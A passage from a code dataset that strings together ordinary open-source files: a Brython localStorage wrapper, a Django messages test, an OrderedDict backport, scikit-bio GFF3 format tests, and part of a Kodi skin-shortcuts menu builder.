keys = self.keys()
return keys.__iter__()
def get(self, key, default=None):
if (not isinstance(key, str)):
raise TypeError("key must be string")
return __BRYTHON__.JSObject(self.store.getItem(key)) or default
def pop(self, key, default=__UnProvided()):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if type(default) is __UnProvided:
ret = self.get(key)
del self[key] # will throw key error if doesn't exist
return ret
else:
if key in self:
ret = self.get(key)
del self[key]
return ret
else:
return default
# while a real dict provides a view, returning a generator would less helpful than simply returning a list
# and creating a custom iterator is overkill and would likely result in slower performance
def keys(self):
return [__BRYTHON__.JSObject(self.store.key(i)) for i in range(self.store.length)]
def values(self):
return [__BRYTHON__.JSObject(self.__getitem__(k)) for k in self.keys()]
def items(self):
return list(zip(self.keys(), self.values()))
def clear(self):
self.store.clear()
def __len__(self):
return self.store.length
if sys.has_local_storage:
storage = LocalStorage()
| gpl-3.0 |
jeezybrick/django | tests/messages_tests/test_api.py | 337 | 1453 | from django.contrib import messages
from django.test import RequestFactory, SimpleTestCase
class DummyStorage(object):
"""
dummy message-store to test the api methods
"""
def __init__(self):
self.store = []
def add(self, level, message, extra_tags=''):
self.store.append(message)
class ApiTest(SimpleTestCase):
def setUp(self):
self.rf = RequestFactory()
self.request = self.rf.request()
self.storage = DummyStorage()
def test_ok(self):
msg = 'some message'
self.request._messages = self.storage
messages.add_message(self.request, messages.DEBUG, msg)
self.assertIn(msg, self.storage.store)
def test_request_is_none(self):
msg = 'some message'
self.request._messages = self.storage
with self.assertRaises(TypeError):
messages.add_message(None, messages.DEBUG, msg)
self.assertEqual([], self.storage.store)
def test_middleware_missing(self):
msg = 'some message'
with self.assertRaises(messages.MessageFailure):
messages.add_message(self.request, messages.DEBUG, msg)
self.assertEqual([], self.storage.store)
def test_middleware_missing_silently(self):
msg = 'some message'
messages.add_message(self.request, messages.DEBUG, msg,
fail_silently=True)
self.assertEqual([], self.storage.store)
| bsd-3-clause |
wakatime/sublime-wakatime | packages/wakatime/packages/ordereddict.py | 254 | 4221 | # Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
| bsd-3-clause |
gregcaporaso/scikit-bio | skbio/io/format/tests/test_gff3.py | 4 | 13406 | # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import TestCase, main
import io
from skbio.util import get_data_path
from skbio.metadata import IntervalMetadata
from skbio import DNA, Sequence
from skbio.io import GFF3FormatError
from skbio.io.format.gff3 import (_yield_record,
_parse_record,
_parse_attr,
_gff3_sniffer,
_gff3_to_interval_metadata,
_interval_metadata_to_gff3,
_gff3_to_generator,
_generator_to_gff3,
_gff3_to_sequence,
_sequence_to_gff3,
_gff3_to_dna,
_dna_to_gff3,
_serialize_interval_metadata)
class GFF3IOTests(TestCase):
def setUp(self):
self.multi_fp = get_data_path('gff3_multi_record')
self.single_fp = get_data_path('gff3_single_record')
intvls = [{'bounds': [(0, 4641652)],
'metadata': {'source': 'European Nucleotide Archive',
'type': 'chromosome',
'score': '.',
'strand': '.',
'ID': 'chromosome:Chromosome',
'Alias': 'U00096.3',
'Is_circular': 'true'}},
{'bounds': [(147, 148)],
'metadata': {'source': 'regulondb_feature',
'type': 'biological_region',
'score': '.',
'strand': '+',
'external_name':
'Promoter thrLp (RegulonDB:ECK120010236)',
'logic_name': 'regulondb_promoter'}},
{'bounds': [(336, 2799)],
'metadata': {'source': 'Prodigal_v2.60',
'type': 'gene',
'score': '1.8',
'strand': '+',
'phase': 0,
'ID': '1_1',
'gc_cont': '0.427'}},
{'bounds': [(336, 2799)],
'metadata': {'source': 'Prodigal_v2.60',
'type': 'CDS',
'score': '333.8',
'strand': '+',
'phase': 0,
'ID': '1_2',
'Parent': '1_1',
'rbs_motif': 'GGAG/GAGG',
'rbs_spacer': '5-10bp'}},
{'bounds': [(0, 50), (55, 100)],
'metadata': {'source': 'Prodigal_v2.60',
'type': 'gene',
'score': '1.8',
'strand': '+',
'phase': 0,
'ID': '1_1',
'gene': 'FXR receptor'}}]
self.upper_bound = 4641652
self.imd1 = IntervalMetadata(self.upper_bound)
self.imd1.add(**intvls[0])
self.imd1.add(**intvls[1])
self.imd2 = IntervalMetadata(None)
self.imd2.add(**intvls[2])
self.imd2.add(**intvls[3])
self.imd3 = IntervalMetadata(None)
self.imd3.add(**intvls[4])
self.seq_fp = get_data_path('gff3_dna')
self.seq = Sequence('ATGCATGCATGC',
metadata={'id': 'NC_1',
'description': 'species X'})
self.seq.interval_metadata.add(
[(0, 9)],
metadata={'source': 'Prodigal_v2.60',
'type': 'gene',
'score': '.',
'strand': '+',
'phase': 0,
'ID': 'gene1',
'Name': 'FXR'})
self.dna = DNA(self.seq)
class SnifferTests(TestCase):
def setUp(self):
self.positive_fps = map(get_data_path, [
'gff3_multi_record',
'gff3_single_record',
'gff3_dna'])
self.negative_fps = map(get_data_path, [
'empty',
'whitespace_only',
'gff3_bad_missing_directive'])
def test_positive(self):
for fp in self.positive_fps:
self.assertEqual(_gff3_sniffer(fp), (True, {}))
def test_negative(self):
for fp in self.negative_fps:
self.assertEqual(_gff3_sniffer(fp), (False, {}))
class ReaderTests(GFF3IOTests):
def test_parse_attr(self):
s = 'Dbxref=GO:000152,GO:001234;Note=fooo'
obs = _parse_attr(s)
exp = {'db_xref': 'GO:000152,GO:001234', 'note': 'fooo'}
self.assertEqual(exp, obs)
def test_yield_record(self):
obs = [('data', 'seqid1', ['seqid1\txxx', 'seqid1\tyyy']),
('data', 'seqid2', ['seqid2\tzzz'])]
s = ('seqid1\txxx\n'
'seqid1\tyyy\n'
'seqid2\tzzz\n')
fh = io.StringIO(s)
for i, j in zip(_yield_record(fh), obs):
self.assertEqual(i, j)
def test_parse_record_raise(self):
chars = 'abc?!'
for char in chars:
lines = [
'ctg123\t.\tgene\t1000\t9000\t.\t+\t%s\tID=gene00001' % char]
with self.assertRaisesRegex(
GFF3FormatError,
r"unknown value for phase column: '%s'" % char):
_parse_record(lines, 10000)
def test_yield_record_raise(self):
s = '##gff-version 3\nseq_1 . gene 1 3 . + . ID=gene01\n'
with io.StringIO(s) as fh:
with self.assertRaises(GFF3FormatError):
list(_yield_record(fh))
def test_gff3_to_interval_metadata(self):
obs = _gff3_to_interval_metadata(
self.single_fp, seq_id='Chromosome')
self.assertEqual(obs, self.imd1)
def test_gff3_to_interval_metadata_empty(self):
exp = IntervalMetadata(None)
obs = _gff3_to_interval_metadata(
# the seq id does not exist
self.single_fp, seq_id='foo')
self.assertEqual(obs, exp)
def test_gff3_to_interval_metadata_bad(self):
with self.assertRaisesRegex(GFF3FormatError,
r'do not have 9 columns in this line'):
_gff3_to_interval_metadata(
get_data_path('gff3_bad_wrong_columns'),
seq_id='Chromosome')
def test_gff3_to_generator(self):
exps = [('Chromosome', self.imd1),
('gi|556503834|ref|NC_000913.3|', self.imd2)]
obss = _gff3_to_generator(self.multi_fp)
for obs, exp in zip(obss, exps):
self.assertEqual(obs, exp)
def test_gff3_to_generator_empty(self):
empty_fps = map(get_data_path, ['empty', 'whitespace_only'])
for empty_fp in empty_fps:
obs = list(_gff3_to_generator(empty_fp))
self.assertEqual(obs, [])
def test_gff3_to_sequence(self):
obs = _gff3_to_sequence(self.seq_fp)
self.assertEqual(obs, self.seq)
def test_gff3_to_dna(self):
obs = _gff3_to_dna(self.seq_fp)
self.assertEqual(obs, self.dna)
class WriterTests(GFF3IOTests):
def test_interval_metadata_to_gff3(self):
with io.StringIO() as fh:
_interval_metadata_to_gff3(self.imd1, fh, seq_id='Chromosome')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
with open(self.single_fp) as f:
exp = [i.rstrip() for i in f.readlines() if not i.startswith('#')]
self.assertEqual(obs, exp)
def test_interval_metadata_to_gff3_missing_field(self):
exp = 'ctg123\t.\tgene\t1\t9\t.\t.\t.\tID=gene00001;Name=EDEN'
imd = IntervalMetadata(9)
imd.add([(0, 9)], metadata={
'type': 'gene', 'ID': 'gene00001', 'Name': 'EDEN'})
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='ctg123')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual([exp], obs)
def test_interval_metadata_to_gff3_escape(self):
# test escape of reserved char in GFF3
exp = 'ctg123\t.\tgene\t1\t9\t.\t.\t.\tID=a%3B%3D%26%2Cb'
imd = IntervalMetadata(9)
imd.add([(0, 9)], metadata={
'type': 'gene', 'ID': 'a;=&,b'})
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='ctg123')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual([exp], obs)
def test_interval_metadata_to_gff3_multiple_values(self):
# test multiple values of db_xref are correctly serialized
exp = 'ctg123\t.\tgene\t1\t9\t.\t.\t.\tDbxref=GO:000152,GO:001234'
imd = IntervalMetadata(9)
imd.add([(0, 9)], metadata={
'type': 'gene', 'db_xref': ['GO:000152', 'GO:001234']})
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='ctg123')
# only compare the uncommented lines because the comments are not
# stored in IntervalMetadata
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual([exp], obs)
def test_interval_metadata_to_gff3_empty(self):
imd = IntervalMetadata(None)
with io.StringIO() as fh:
_interval_metadata_to_gff3(imd, fh, seq_id='foo')
obs = fh.getvalue()
self.assertEqual(obs, '##gff-version 3\n')
def test_interval_metadata_to_gff3_sub_region(self):
seq_id = 'NC 7'
with open(self.multi_fp) as f:
exp = [i.strip() for i in f if i.startswith(seq_id)]
with io.StringIO() as fh:
_serialize_interval_metadata(
self.imd3, seq_id=seq_id, fh=fh, skip_subregion=False)
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
self.assertEqual(exp, obs)
with io.StringIO() as fh:
_serialize_interval_metadata(self.imd3, seq_id=seq_id, fh=fh)
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
# all the rest lines except the 1st are sub-region lines, so only
# compare the first line from exp
self.assertEqual(exp[:1], obs)
def test_sequence_to_gff3(self):
with io.StringIO() as fh:
_sequence_to_gff3(self.seq, fh)
obs = fh.getvalue()
with open(self.seq_fp) as fh:
exp = fh.read()
self.assertEqual(exp, obs)
def test_dna_to_gff3(self):
with io.StringIO() as fh:
_dna_to_gff3(self.dna, fh)
obs = fh.getvalue()
with open(self.seq_fp) as fh:
exp = fh.read()
self.assertEqual(exp, obs)
def test_raise_subregion(self):
im = IntervalMetadata(None)
im.add([(0, 3), (7, 9)], metadata={'type': 'gene'})
with io.StringIO() as fh:
with self.assertRaises(GFF3FormatError):
_serialize_interval_metadata(
im, seq_id='a', fh=fh, skip_subregion=False)
class RoundtripTests(GFF3IOTests):
def test_roundtrip_interval_metadata(self):
''''''
with io.StringIO() as fh:
_interval_metadata_to_gff3(
_gff3_to_interval_metadata(
self.single_fp,
seq_id='Chromosome'),
fh,
seq_id='Chromosome')
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
with open(self.single_fp) as f:
exp = [i.rstrip() for i in f.readlines() if not i.startswith('#')]
self.assertEqual(obs, exp)
def test_roundtrip_interval_metadata_generator(self):
with io.StringIO() as fh:
_generator_to_gff3(
_gff3_to_generator(self.multi_fp), fh, skip_subregion=False)
obs = [i for i in fh.getvalue().splitlines()
if not i.startswith('#')]
with open(self.multi_fp) as f:
exp = [i.rstrip() for i in f.readlines() if not i.startswith('#')]
self.assertEqual(obs, exp)
if __name__ == '__main__':
main()
| bsd-3-clause |
AMOboxTV/AMOBox.LegoBuild | script.skinshortcuts/resources/lib/xmlfunctions.py | 1 | 51495 | # coding=utf-8
import os, sys, datetime, unicodedata, re
import xbmc, xbmcgui, xbmcvfs, xbmcaddon
import xml.etree.ElementTree as xmltree
from xml.sax.saxutils import escape as escapeXML
import ast
from traceback import print_exc
from unicodeutils import try_decode
if sys.version_info < (2, 7):
import simplejson
else:
import json as simplejson
__addon__ = xbmcaddon.Addon()
__addonid__ = sys.modules[ "__main__" ].__addonid__
__addonversion__ = __addon__.getAddonInfo('version')
__xbmcversion__ = xbmc.getInfoLabel( "System.BuildVersion" ).split(".")[0]
__datapath__ = os.path.join( xbmc.translatePath( "special://profile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__masterpath__ = os.path.join( xbmc.translatePath( "special://masterprofile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__skin__ = xbmc.translatePath( "special://skin/" )
__language__ = __addon__.getLocalizedString
import datafunctions, template
DATA = datafunctions.DataFunctions()
import hashlib, hashlist
def log(txt):
if __addon__.getSetting( "enable_logging" ) == "true":
if isinstance (txt,str):
txt = txt.decode('utf-8')
message = u'%s: %s' % (__addonid__, txt)
xbmc.log(msg=message.encode('utf-8'), level=xbmc.LOGDEBUG)
class XMLFunctions():
def __init__(self):
self.MAINWIDGET = {}
self.MAINBACKGROUND = {}
self.MAINPROPERTIES = {}
self.hasSettings = False
self.widgetCount = 1
self.loadedPropertyPatterns = False
self.propertyPatterns = None
self.skinDir = xbmc.translatePath( "special://skin" )
self.checkForShorctcuts = []
def buildMenu( self, mainmenuID, groups, numLevels, buildMode, options, minitems, weEnabledSystemDebug = False, weEnabledScriptDebug = False ):
# Entry point for building includes.xml files
if xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-isrunning" ) == "True":
return
xbmcgui.Window( 10000 ).setProperty( "skinshortcuts-isrunning", "True" )
# Get a list of profiles
fav_file = xbmc.translatePath( 'special://userdata/profiles.xml' ).decode("utf-8")
tree = None
if xbmcvfs.exists( fav_file ):
f = xbmcvfs.File( fav_file )
tree = xmltree.fromstring( f.read() )
profilelist = []
if tree is not None:
profiles = tree.findall( "profile" )
for profile in profiles:
name = profile.find( "name" ).text.encode( "utf-8" )
dir = profile.find( "directory" ).text.encode( "utf-8" )
log( "Profile found: " + name + " (" + dir + ")" )
# Localise the directory
if "://" in dir:
dir = xbmc.translatePath( dir ).decode( "utf-8" )
else:
# Base if off of the master profile
dir = xbmc.translatePath( os.path.join( "special://masterprofile", dir ) ).decode( "utf-8" )
profilelist.append( [ dir, "StringCompare(System.ProfileName," + name.decode( "utf-8" ) + ")", name.decode( "utf-8" ) ] )
else:
profilelist = [["special://masterprofile", None]]
if self.shouldwerun( profilelist ) == False:
log( "Menu is up to date" )
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
return
progress = None
# Create a progress dialog
progress = xbmcgui.DialogProgressBG()
progress.create(__addon__.getAddonInfo( "name" ), __language__( 32049 ) )
progress.update( 0 )
# Write the menus
try:
self.writexml( profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems )
complete = True
except:
log( "Failed to write menu" )
print_exc()
complete = False
# Mark that we're no longer running, clear the progress dialog
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
progress.close()
if complete == True:
# Menu is built, reload the skin
xbmc.executebuiltin( "XBMC.ReloadSkin()" )
else:
# Menu couldn't be built - generate a debug log
# If we enabled debug logging
if weEnabledSystemDebug or weEnabledScriptDebug:
# Disable any logging we enabled
if weEnabledSystemDebug:
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":false} } ' )
if weEnabledScriptDebug:
__addon__.setSetting( "enable_logging", "false" )
# Offer to upload a debug log
if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
if ret:
xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
else:
xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
else:
# Enable any debug logging needed
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method": "Settings.getSettings" }')
json_query = unicode(json_query, 'utf-8', errors='ignore')
json_response = simplejson.loads(json_query)
enabledSystemDebug = False
enabledScriptDebug = False
if json_response.has_key('result') and json_response['result'].has_key('settings') and json_response['result']['settings'] is not None:
for item in json_response['result']['settings']:
if item["id"] == "debug.showloginfo":
if item["value"] == False:
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":true} } ' )
enabledSystemDebug = True
if __addon__.getSetting( "enable_logging" ) != "true":
__addon__.setSetting( "enable_logging", "true" )
enabledScriptDebug = True
if enabledSystemDebug or enabledScriptDebug:
# We enabled one or more of the debug options, re-run this function
self.buildMenu( mainmenuID, groups, numLevels, buildMode, options, minitems, enabledSystemDebug, enabledScriptDebug )
else:
# Offer to upload a debug log
if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
if ret:
xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
else:
xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
def shouldwerun( self, profilelist ):
try:
property = xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-reloadmainmenu" )
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-reloadmainmenu" )
if property == "True":
log( "Menu has been edited")
return True
except:
pass
# Save some settings to skin strings
xbmc.executebuiltin( "Skin.SetString(skinshortcuts-sharedmenu,%s)" %( __addon__.getSetting( "shared_menu" ) ) )
# Get the skins addon.xml file
addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
addon = xmltree.parse( addonpath )
extensionpoints = addon.findall( "extension" )
paths = []
skinpaths = []
# Get the skin version
skinVersion = addon.getroot().attrib.get( "version" )
# Get the directories for resolutions this skin supports
for extensionpoint in extensionpoints:
if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
resolutions = extensionpoint.findall( "res" )
for resolution in resolutions:
path = xbmc.translatePath( os.path.join( "special://skin/", resolution.attrib.get( "folder" ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode("utf-8")
paths.append( path )
skinpaths.append( path )
# Check for the includes file
for path in paths:
if not xbmcvfs.exists( path ):
log( "Includes file does not exist" )
return True
else:
pass
try:
hashes = ast.literal_eval( xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ) ).read() )
except:
# There is no hash list, return True
log( "No hash list" )
print_exc()
return True
checkedXBMCVer = False
checkedSkinVer = False
checkedScriptVer = False
checkedProfileList = False
checkedPVRVis = False
checkedSharedMenu = False
foundFullMenu = False
for hash in hashes:
if hash[1] is not None:
if hash[0] == "::XBMCVER::":
# Check the skin version is still the same as hash[1]
checkedXBMCVer = True
if __xbmcversion__ != hash[1]:
log( "Now running a different version of Kodi" )
return True
elif hash[0] == "::SKINVER::":
# Check the skin version is still the same as hash[1]
checkedSkinVer = True
if skinVersion != hash[1]:
log( "Now running a different skin version" )
return True
elif hash[0] == "::SCRIPTVER::":
# Check the script version is still the same as hash[1]
checkedScriptVer = True
if __addonversion__ != hash[1]:
log( "Now running a different script version" )
return True
elif hash[0] == "::PROFILELIST::":
# Check the profilelist is still the same as hash[1]
checkedProfileList = True
if profilelist != hash[1]:
log( "Profiles have changes" )
return True
elif hash[0] == "::HIDEPVR::":
checkedPVRVis = True
if __addon__.getSetting( "donthidepvr" ) != hash[1]:
log( "PVR visibility setting has changed" )
elif hash[0] == "::SHARED::":
# Check whether shared-menu setting has changed
checkedSharedMenu = True
if __addon__.getSetting( "shared_menu" ) != hash[1]:
log( "Shared menu setting has changed" )
return True
elif hash[0] == "::LANGUAGE::":
# We no longer need to rebuild on a system language change
pass
elif hash[0] == "::SKINBOOL::":
# A boolean we need to set (if profile matches)
if xbmc.getCondVisibility( hash[ 1 ][ 0 ] ):
if hash[ 1 ][ 2 ] == "True":
xbmc.executebuiltin( "Skin.SetBool(%s)" %( hash[ 1 ][ 1 ] ) )
else:
xbmc.executebuiltin( "Skin.Reset(%s)" %( hash[ 1 ][ 1 ] ) )
elif hash[0] == "::FULLMENU::":
# Mark that we need to set the fullmenu bool
foundFullMenu = True
elif hash[0] == "::SKINDIR::":
# Used to import menus from one skin to another, nothing to check here
pass
else:
try:
hasher = hashlib.md5()
hasher.update( xbmcvfs.File( hash[0] ).read() )
if hasher.hexdigest() != hash[1]:
log( "Hash does not match on file " + hash[0] )
log( "(" + hash[1] + " > " + hasher.hexdigest() + ")" )
return True
except:
log( "Unable to generate hash for %s" %( hash[ 0 ] ) )
log( "(%s > ?)" %( hash[ 1 ] ) )
else:
if xbmcvfs.exists( hash[0] ):
log( "File now exists " + hash[0] )
return True
# Set or clear the FullMenu skin bool
if foundFullMenu:
xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
else:
xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )
# If the skin or script version, or profile list, haven't been checked, we need to rebuild the menu
# (most likely we're running an old version of the script)
if checkedXBMCVer == False or checkedSkinVer == False or checkedScriptVer == False or checkedProfileList == False or checkedPVRVis == False or checkedSharedMenu == False:
return True
# If we get here, the menu does not need to be rebuilt.
return False
def writexml( self, profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems ):
# Reset the hashlist, add the profile list and script version
hashlist.list = []
hashlist.list.append( ["::PROFILELIST::", profilelist] )
hashlist.list.append( ["::SCRIPTVER::", __addonversion__] )
hashlist.list.append( ["::XBMCVER::", __xbmcversion__] )
hashlist.list.append( ["::HIDEPVR::", __addon__.getSetting( "donthidepvr" )] )
hashlist.list.append( ["::SHARED::", __addon__.getSetting( "shared_menu" )] )
hashlist.list.append( ["::SKINDIR::", xbmc.getSkinDir()] )
# Clear any skin settings for backgrounds and widgets
DATA._reset_backgroundandwidgets()
self.widgetCount = 1
# Create a new tree and includes for the various groups
tree = xmltree.ElementTree( xmltree.Element( "includes" ) )
root = tree.getroot()
# Create a Template object and pass it the root
Template = template.Template()
Template.includes = root
Template.progress = progress
# Get any shortcuts we're checking for
self.checkForShortcuts = []
overridestree = DATA._get_overrides_skin()
checkForShorctcutsOverrides = overridestree.getroot().findall( "checkforshortcut" )
for checkForShortcutOverride in checkForShorctcutsOverrides:
if "property" in checkForShortcutOverride.attrib:
# Add this to the list of shortcuts we'll check for
self.checkForShortcuts.append( ( checkForShortcutOverride.text.lower(), checkForShortcutOverride.attrib.get( "property" ), "False" ) )
mainmenuTree = xmltree.SubElement( root, "include" )
mainmenuTree.set( "name", "skinshortcuts-mainmenu" )
submenuTrees = []
for level in range( 0, int( numLevels) + 1 ):
subelement = xmltree.SubElement(root, "include")
subtree = xmltree.SubElement( root, "include" )
if level == 0:
subtree.set( "name", "skinshortcuts-submenu" )
else:
subtree.set( "name", "skinshortcuts-submenu-" + str( level ) )
if not subtree in submenuTrees:
submenuTrees.append( subtree )
if buildMode == "single":
allmenuTree = xmltree.SubElement( root, "include" )
allmenuTree.set( "name", "skinshortcuts-allmenus" )
profilePercent = 100 / len( profilelist )
profileCount = -1
submenuNodes = {}
for profile in profilelist:
log( "Building menu for profile %s" %( profile[ 2 ] ) )
# Load profile details
profileDir = profile[0]
profileVis = profile[1]
profileCount += 1
# Reset whether we have settings
self.hasSettings = False
# Reset any checkForShortcuts to say we haven't found them
newCheckForShortcuts = []
for checkforShortcut in self.checkForShortcuts:
newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "False" ) )
self.checkForShortcuts = newCheckForShortcuts
# Clear any previous labelID's
DATA._clear_labelID()
# Clear any additional properties, which may be for a different profile
DATA.currentProperties = None
# Create objects to hold the items
menuitems = []
templateMainMenuItems = xmltree.Element( "includes" )
# If building the main menu, split the mainmenu shortcut nodes into the menuitems list
fullMenu = False
if groups == "" or groups.split( "|" )[0] == "mainmenu":
# Set a skinstring that marks that we're providing the whole menu
xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
hashlist.list.append( ["::FULLMENU::", "True"] )
for node in DATA._get_shortcuts( "mainmenu", None, True, profile[0] ).findall( "shortcut" ):
menuitems.append( node )
fullMenu = True
else:
# Clear any skinstring marking that we're providing the whole menu
xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )
hashlist.list.append( ["::FULLMENU::", "False"] )
# If building specific groups, split them into the menuitems list
count = 0
if groups != "":
for group in groups.split( "|" ):
if count != 0 or group != "mainmenu":
menuitems.append( group )
if len( menuitems ) == 0:
# No groups to build
break
itemidmainmenu = 0
if len( Template.otherTemplates ) == 0:
percent = profilePercent / len( menuitems )
else:
percent = float( profilePercent ) / float( len( menuitems ) * 2 )
Template.percent = percent * ( len( menuitems ) )
i = 0
for item in menuitems:
i += 1
itemidmainmenu += 1
currentProgress = ( profilePercent * profileCount ) + ( percent * i )
progress.update( int( currentProgress ) )
Template.current = currentProgress
submenuDefaultID = None
if not isinstance( item, basestring ):
# This is a main menu item (we know this because it's an element, not a string)
submenu = item.find( "labelID" ).text
# Build the menu item
menuitem, allProps = self.buildElement( item, "mainmenu", None, profile[1], DATA.slugify( submenu, convertInteger=True ), itemid = itemidmainmenu, options = options )
# Save a copy for the template
templateMainMenuItems.append( Template.copy_tree( menuitem ) )
# Get submenu defaultID
submenuDefaultID = item.find( "defaultID" ).text
# Remove any template-only properties
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
for key in otherProperties:
if key in allProps.keys() and key in templateOnly:
# This key is template-only
menuitem.remove( allProps[ key ] )
allProps.pop( key )
# Add the menu item to the various includes, retaining a reference to them
mainmenuItemA = Template.copy_tree( menuitem )
mainmenuTree.append( mainmenuItemA )
if buildMode == "single":
mainmenuItemB = Template.copy_tree( menuitem )
allmenuTree.append( mainmenuItemB )
else:
# It's an additional menu, so get its labelID
submenu = DATA._get_labelID( item, None )
# Build the submenu
count = 0 # Used to keep track of additional submenu
for submenuTree in submenuTrees:
submenuVisibilityName = submenu
if count == 1:
submenu = submenu + "." + str( count )
elif count != 0:
submenu = submenu[:-1] + str( count )
submenuVisibilityName = submenu[:-2]
# Get the tree's we're going to write the menu to
if submenu in submenuNodes:
justmenuTreeA = submenuNodes[ submenu ][ 0 ]
justmenuTreeB = submenuNodes[ submenu ][ 1 ]
else:
# Create these nodes
justmenuTreeA = xmltree.SubElement( root, "include" )
justmenuTreeB = xmltree.SubElement( root, "include" )
